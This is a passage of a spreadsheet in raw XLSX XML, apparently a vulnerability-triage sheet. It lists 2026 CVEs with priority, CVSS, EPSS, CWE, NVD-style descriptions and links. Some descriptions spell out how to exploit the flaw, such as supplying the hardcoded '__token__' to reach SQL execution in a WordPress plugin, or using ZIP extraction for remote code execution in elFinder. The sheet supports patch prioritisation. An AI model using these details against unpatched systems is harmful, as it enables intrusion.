          <t>The Next-Cart Store to WooCommerce Migration plugin for WordPress is vulnerable to Authentication Bypass in all versions up to, and including, 3.9.8 via the `NCWM_Kitconnect::run()` function. This is due to the plugin registering the `/wp-json/next_cart/v1/migration` REST route with `permission_callback` set to `__return_true` and relying on a hardcoded fallback value of `__token__` in `get_option('nextcart_token', '__token__')` when the `nextcart_token` option has not yet been written to the database. This makes it possible for unauthenticated attackers to bypass authentication to the migration endpoint by supplying the literal string `__token__` as the token, gaining access to privileged handlers that pass attacker-controlled SQL directly to `$wpdb-&gt;query()` and `$wpdb-&gt;get_results()` — enabling arbitrary SQL execution including administrator account creation — and pass an attacker-controlled path to `unlink()`, enabling arbitrary file deletion and full site takeover. The hardcoded fallback is reachable whenever the `nextcart_token` option has not yet been populated, which occurs after WP-CLI, network, or programmatic plugin activation without a subsequent authenticated `wp-admin` visit, as token generation is deferred to `admin_init` via `register_settings()`.</t>
        </is>
      </c>
      <c r="M1886" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76009</t>
        </is>
      </c>
    </row>
    <row r="1887">
      <c r="A1887" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1887" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77317</t>
        </is>
      </c>
      <c r="C1887" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1887" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1887" s="5" t="inlineStr"/>
      <c r="F1887" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1887" s="5" t="inlineStr"/>
      <c r="H1887" s="5" t="inlineStr"/>
      <c r="I1887" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J1887" s="5" t="inlineStr"/>
      <c r="K1887" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1887" s="5" t="inlineStr">
        <is>
          <t>SeaweedFS is a distributed storage system for files and blobs. In versions from 3.88 through 4.39, the SFTP server evaluates configured path permissions with a literal string-prefix comparison, so a user scoped to a path is also granted the same access to any sibling path whose name merely begins with the same characters. A user granted access to /tenants/alice therefore also matches /tenants/alice-archive, /tenants/alice2, and similar siblings, because the check does not require a path-component boundary. An authenticated low-privilege SFTP user with a root home directory and narrow path permissions can thereby cross the configured ACL boundary to read another tenant's files, and to overwrite them if granted write, all through the documented SFTP service with its own valid credentials. This issue is fixed in version 4.40.</t>
        </is>
      </c>
      <c r="M1887" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77317</t>
        </is>
      </c>
    </row>
    <row r="1888">
      <c r="A1888" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1888" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77505</t>
        </is>
      </c>
      <c r="C1888" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1888" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1888" s="5" t="inlineStr"/>
      <c r="F1888" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1888" s="5" t="inlineStr"/>
      <c r="H1888" s="5" t="inlineStr"/>
      <c r="I1888" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1888" s="5" t="inlineStr"/>
      <c r="K1888" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1888" s="5" t="inlineStr">
        <is>
          <t>Use after free in DNS Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1888" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77505</t>
        </is>
      </c>
    </row>
    <row r="1889">
      <c r="A1889" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1889" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77567</t>
        </is>
      </c>
      <c r="C1889" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1889" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1889" s="5" t="inlineStr"/>
      <c r="F1889" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1889" s="5" t="inlineStr"/>
      <c r="H1889" s="5" t="inlineStr"/>
      <c r="I1889" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J1889" s="5" t="inlineStr"/>
      <c r="K1889" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L1889" s="5" t="inlineStr">
        <is>
          <t>Filament is a collection of full-stack components for accelerated Laravel development. Prior to versions 4.12.0 and 5.7.0, incorrect challenge-form required-field handling allows app-based multi-factor authentication to be bypassed when recovery codes are enabled. Email-based multi-factor authentication is not affected. This issue is fixed in versions 4.12.0 and 5.7.0.</t>
        </is>
      </c>
      <c r="M1889" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77567</t>
        </is>
      </c>
    </row>
    <row r="1890">
      <c r="A1890" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1890" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78444</t>
        </is>
      </c>
      <c r="C1890" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1890" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1890" s="5" t="inlineStr"/>
      <c r="F1890" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1890" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1890" s="5" t="inlineStr"/>
      <c r="I1890" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1890" s="5" t="inlineStr"/>
      <c r="K1890" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="L1890" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows Failover Cluster allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1890" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78444</t>
        </is>
      </c>
    </row>
    <row r="1891">
      <c r="A1891" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1891" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78449</t>
        </is>
      </c>
      <c r="C1891" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1891" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1891" s="5" t="inlineStr"/>
      <c r="F1891" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1891" s="5" t="inlineStr"/>
      <c r="H1891" s="5" t="inlineStr"/>
      <c r="I1891" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1891" s="5" t="inlineStr"/>
      <c r="K1891" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1891" s="5" t="inlineStr">
        <is>
          <t>Use after free in Reliable Multicast Transport Driver (RMCAST) allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1891" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78449</t>
        </is>
      </c>
    </row>
    <row r="1892">
      <c r="A1892" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1892" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78450</t>
        </is>
      </c>
      <c r="C1892" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1892" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1892" s="5" t="inlineStr"/>
      <c r="F1892" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1892" s="5" t="inlineStr"/>
      <c r="H1892" s="5" t="inlineStr"/>
      <c r="I1892" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1892" s="5" t="inlineStr"/>
      <c r="K1892" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1892" s="5" t="inlineStr">
        <is>
          <t>Use after free in Reliable Multicast Transport Driver (RMCAST) allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1892" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78450</t>
        </is>
      </c>
    </row>
    <row r="1893">
      <c r="A1893" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1893" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78583</t>
        </is>
      </c>
      <c r="C1893" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1893" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1893" s="5" t="inlineStr"/>
      <c r="F1893" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1893" s="5" t="inlineStr">
        <is>
          <t>elasticsearch</t>
        </is>
      </c>
      <c r="H1893" s="5" t="inlineStr">
        <is>
          <t>elastic:kibana</t>
        </is>
      </c>
      <c r="I1893" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1893" s="5" t="inlineStr"/>
      <c r="K1893" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1893" s="5" t="inlineStr">
        <is>
          <t>Incorrect Authorization (CWE-863) in Kibana can lead to privilege escalation via Input Data Manipulation (CAPEC-153). Elasticsearch cluster privilege declarations originating from integration packages were not validated before being used to mint credentials for enrolled Elastic Agents. A user holding Fleet management privileges could therefore cause every Elastic Agent on a targeted policy to receive a credential carrying arbitrarily elevated Elasticsearch cluster privileges, up to and including full cluster administration.</t>
        </is>
      </c>
      <c r="M1893" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78583</t>
        </is>
      </c>
    </row>
    <row r="1894">
      <c r="A1894" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1894" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78626</t>
        </is>
      </c>
      <c r="C1894" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1894" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1894" s="5" t="inlineStr"/>
      <c r="F1894" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1894" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="H1894" s="5" t="inlineStr"/>
      <c r="I1894" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1894" s="5" t="inlineStr"/>
      <c r="K1894" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1894" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="M1894" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78626</t>
        </is>
      </c>
    </row>
    <row r="1895">
      <c r="A1895" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1895" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78839</t>
        </is>
      </c>
      <c r="C1895" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1895" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1895" s="5" t="inlineStr"/>
      <c r="F1895" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1895" s="5" t="inlineStr"/>
      <c r="H1895" s="5" t="inlineStr"/>
      <c r="I1895" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1895" s="5" t="inlineStr"/>
      <c r="K1895" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="L1895" s="5" t="inlineStr">
        <is>
          <t>An arbitrary file upload vulnerability in AppNitro MachForm v30 allows attackers to execute arbitrary code via uploading a crafted .phar file.</t>
        </is>
      </c>
      <c r="M1895" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78839</t>
        </is>
      </c>
    </row>
    <row r="1896">
      <c r="A1896" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1896" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79678</t>
        </is>
      </c>
      <c r="C1896" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1896" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1896" s="5" t="inlineStr"/>
      <c r="F1896" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1896" s="5" t="inlineStr"/>
      <c r="H1896" s="5" t="inlineStr"/>
      <c r="I1896" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1896" s="5" t="inlineStr"/>
      <c r="K1896" s="5" t="inlineStr">
        <is>
          <t>CWE-95</t>
        </is>
      </c>
      <c r="L1896" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in FreeIPA's idp-add command, where insufficiently validated --organization/--base-url input reaches a constrained eval() call before the corresponding LDAP access control check is enforced. This allows any authenticated IPA principal, regardless of privilege level, to enumerate and read the environment variables of the affected server process and to cause denial of service via memory exhaustion.</t>
        </is>
      </c>
      <c r="M1896" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79678</t>
        </is>
      </c>
    </row>
    <row r="1897">
      <c r="A1897" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1897" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79746</t>
        </is>
      </c>
      <c r="C1897" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1897" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1897" s="5" t="inlineStr"/>
      <c r="F1897" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1897" s="5" t="inlineStr"/>
      <c r="H1897" s="5" t="inlineStr"/>
      <c r="I1897" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J1897" s="5" t="inlineStr"/>
      <c r="K1897" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1897" s="5" t="inlineStr">
        <is>
          <t>MCPHub is a unified hub for centrally managing and dynamically orchestrating multiple MCP servers/APIs into separate endpoints with flexible routing strategies. Prior to version 1.0.31, when a bearer key with accessType: 'servers' (or 'custom') is used against a group route, isBearerKeyAllowedForRequest grants access to the entire group as long as any single server in that group appears in the key's allowedServers list — not only when every server the key is scoped to matches, and critically, without ever re-checking allowedServers again once the group-level connection is authorized. A key explicitly scoped to one specific server therefore also grants full access to every other server that happens to share a group with it, including servers the key was never authorized for. This issue has been patched in version 1.0.31.</t>
        </is>
      </c>
      <c r="M1897" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79746</t>
        </is>
      </c>
    </row>
    <row r="1898">
      <c r="A1898" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1898" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80132</t>
        </is>
      </c>
      <c r="C1898" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1898" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1898" s="5" t="inlineStr"/>
      <c r="F1898" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1898" s="5" t="inlineStr"/>
      <c r="H1898" s="5" t="inlineStr"/>
      <c r="I1898" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1898" s="5" t="inlineStr"/>
      <c r="K1898" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L1898" s="5" t="inlineStr">
        <is>
          <t>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M1898" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80132</t>
        </is>
      </c>
    </row>
    <row r="1899">
      <c r="A1899" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1899" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80354</t>
        </is>
      </c>
      <c r="C1899" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1899" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1899" s="5" t="inlineStr"/>
      <c r="F1899" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1899" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H1899" s="5" t="inlineStr"/>
      <c r="I1899" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1899" s="5" t="inlineStr"/>
      <c r="K1899" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L1899" s="5" t="inlineStr">
        <is>
          <t>Authorization bypass through User-Controlled key vulnerability in Apache Camel K.
An authorization vulnerability in custom resource resolution allows a tenant to reference secrets by name in the operator namespace, potentially exposing secrets belonging to other tenants or operator components.
This issue affects Apache Camel K: from 2.0.0 before 2.9.3, from 2.10.1 before 2.10.2.
Users are recommended to upgrade to version 2.9.3, 2.10.2 or 2.11.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="M1899" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80354</t>
        </is>
      </c>
    </row>
    <row r="1900">
      <c r="A1900" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1900" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81268</t>
        </is>
      </c>
      <c r="C1900" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1900" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1900" s="5" t="inlineStr"/>
      <c r="F1900" s="5" t="inlineStr"/>
      <c r="G1900" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1900" s="5" t="inlineStr"/>
      <c r="I1900" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1900" s="5" t="inlineStr"/>
      <c r="K1900" s="5" t="inlineStr">
        <is>
          <t>CWE-613</t>
        </is>
      </c>
      <c r="L1900" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5 could allow a remote authenticated attacker to execute flows and obtain sensitive information due to insufficient session expiration of API keys after user deactivation.</t>
        </is>
      </c>
      <c r="M1900" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81268</t>
        </is>
      </c>
    </row>
    <row r="1901">
      <c r="A1901" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1901" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81784</t>
        </is>
      </c>
      <c r="C1901" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1901" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1901" s="5" t="inlineStr"/>
      <c r="F1901" s="5" t="inlineStr"/>
      <c r="G1901" s="5" t="inlineStr"/>
      <c r="H1901" s="5" t="inlineStr"/>
      <c r="I1901" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1901" s="5" t="inlineStr"/>
      <c r="K1901" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L1901" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated PHP Object Injection in Wise Chat &lt;= 3.4 versions.</t>
        </is>
      </c>
      <c r="M1901" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81784</t>
        </is>
      </c>
    </row>
    <row r="1902">
      <c r="A1902" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1902" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81801</t>
        </is>
      </c>
      <c r="C1902" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1902" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1902" s="5" t="inlineStr"/>
      <c r="F1902" s="5" t="inlineStr"/>
      <c r="G1902" s="5" t="inlineStr"/>
      <c r="H1902" s="5" t="inlineStr"/>
      <c r="I1902" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1902" s="5" t="inlineStr"/>
      <c r="K1902" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1902" s="5" t="inlineStr">
        <is>
          <t>Subscriber Settings Change in WP-Stateless &lt;= 4.4.1 versions.</t>
        </is>
      </c>
      <c r="M1902" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81801</t>
        </is>
      </c>
    </row>
    <row r="1903">
      <c r="A1903" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1903" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81805</t>
        </is>
      </c>
      <c r="C1903" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1903" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1903" s="5" t="inlineStr"/>
      <c r="F1903" s="5" t="inlineStr"/>
      <c r="G1903" s="5" t="inlineStr"/>
      <c r="H1903" s="5" t="inlineStr"/>
      <c r="I1903" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1903" s="5" t="inlineStr"/>
      <c r="K1903" s="5" t="inlineStr">
        <is>
          <t>CWE-266</t>
        </is>
      </c>
      <c r="L1903" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Privilege Escalation in SiteSkite &lt;= 2.1.5 versions.</t>
        </is>
      </c>
      <c r="M1903" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81805</t>
        </is>
      </c>
    </row>
    <row r="1904">
      <c r="A1904" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1904" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81891</t>
        </is>
      </c>
      <c r="C1904" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1904" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1904" s="5" t="inlineStr"/>
      <c r="F1904" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1904" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1904" s="5" t="inlineStr"/>
      <c r="I1904" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J1904" s="5" t="inlineStr"/>
      <c r="K1904" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="L1904" s="5" t="inlineStr">
        <is>
          <t>elFinder is an open-source file manager for web, written in JavaScript using jQuery UI. Prior to 2.1.70, checkExtractItems() in php/elFinderVolumeDriver.class.php calls mimetypeInternalDetect() without passing the result through mimeTypeNormalize(). Because the .phtml, .phar, .php5, and .php3 extensions are absent from mime.types, the staticMimeMap entries that map them to text/x-php are not applied, and allowPutMime() permits extraction even when uploadDeny blocks text/x-php. An attacker with ZIP upload permission can extract PHP-executable files into a web-accessible files/ directory and achieve remote code execution when the server executes those extensions. This issue is fixed in version 2.1.70.</t>
        </is>
      </c>
      <c r="M1904" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81891</t>
        </is>
      </c>
    </row>
    <row r="1905">
      <c r="A1905" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1905" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81892</t>
        </is>
      </c>
      <c r="C1905" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1905" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1905" s="5" t="inlineStr"/>
      <c r="F1905" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1905" s="5" t="inlineStr"/>
      <c r="H1905" s="5" t="inlineStr"/>
      <c r="I1905" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J1905" s="5" t="inlineStr"/>
      <c r="K1905" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862, CWE-863</t>
        </is>
      </c>
      <c r="L1905" s="5" t="inlineStr">
        <is>
          <t>EasyAdmin is a fast and modern admin generator for Symfony applications. From 4.0.0 until 4.29.16 and 5.5.1, EasyAdmin serves all backend requests through a single dashboard route and, for custom actions (Action::linkToRoute() and MenuItem::linkToRoute()), swaps the executed controller based on the routeName query parameter on the kernel.controller event. The swap happens after Symfony's security firewall has already evaluated access_control against the original dashboard URL, and the routeName value was not validated. As a result, a path-based access_control rule protecting the target route was never evaluated, so a low-privilege backend user who can reach a single EasyAdmin URL and knows a target route's name can execute that route's controller, bypassing the path-based rule. Only path-based protections are bypassed. Routes whose controller enforces its own authorization with #[IsGranted] or denyAccessUnlessGranted() remain protected because those checks are recomputed against the swapped-in controller. This issue is fixed in versions 4.29.16 and 5.5.1.</t>
        </is>
      </c>
      <c r="M1905" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81892</t>
        </is>
      </c>
    </row>
    <row r="1906">
      <c r="A1906" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1906" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82302</t>
        </is>
      </c>
      <c r="C1906" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1906" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1906" s="5" t="inlineStr"/>
      <c r="F1906" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1906" s="5" t="inlineStr"/>
      <c r="H1906" s="5" t="inlineStr"/>
      <c r="I1906" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1906" s="5" t="inlineStr"/>
      <c r="K1906" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1906" s="5" t="inlineStr">
        <is>
          <t>Incorrect Authorization (CWE-863) in Kibana can lead to unauthorized configuration modification via Exploiting Incorrectly Configured Access Control Security Levels (CAPEC-180).</t>
        </is>
      </c>
      <c r="M1906" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82302</t>
        </is>
      </c>
    </row>
    <row r="1907">
      <c r="A1907" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1907" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82925</t>
        </is>
      </c>
      <c r="C1907" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1907" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1907" s="5" t="inlineStr"/>
      <c r="F1907" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1907" s="5" t="inlineStr"/>
      <c r="H1907" s="5" t="inlineStr"/>
      <c r="I1907" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1907" s="5" t="inlineStr"/>
      <c r="K1907" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L1907" s="5" t="inlineStr">
        <is>
          <t>The Site Reviews WordPress plugin before 8.3.0 does not prevent request data from being deserialized, and derives the key protecting that data by padding out the site's WordPress nonce key, which makes the key publicly computable on installs where that key is absent, left at its sample value, or too short to be secret. This allows unauthenticated users to inject arbitrary PHP objects on such installs. The Site Reviews WordPress plugin before 8.3.0's own code contains no chain onward from the injected object, so how far it reaches depends on the other code present on the site.</t>
        </is>
      </c>
      <c r="M1907" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82925</t>
        </is>
      </c>
    </row>
    <row r="1908">
      <c r="A1908" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1908" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83527</t>
        </is>
      </c>
      <c r="C1908" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D1908" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1908" s="5" t="inlineStr"/>
      <c r="F1908" s="5" t="n">
        <v>0.015</v>
      </c>
      <c r="G1908" s="5" t="inlineStr"/>
      <c r="H1908" s="5" t="inlineStr"/>
      <c r="I1908" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
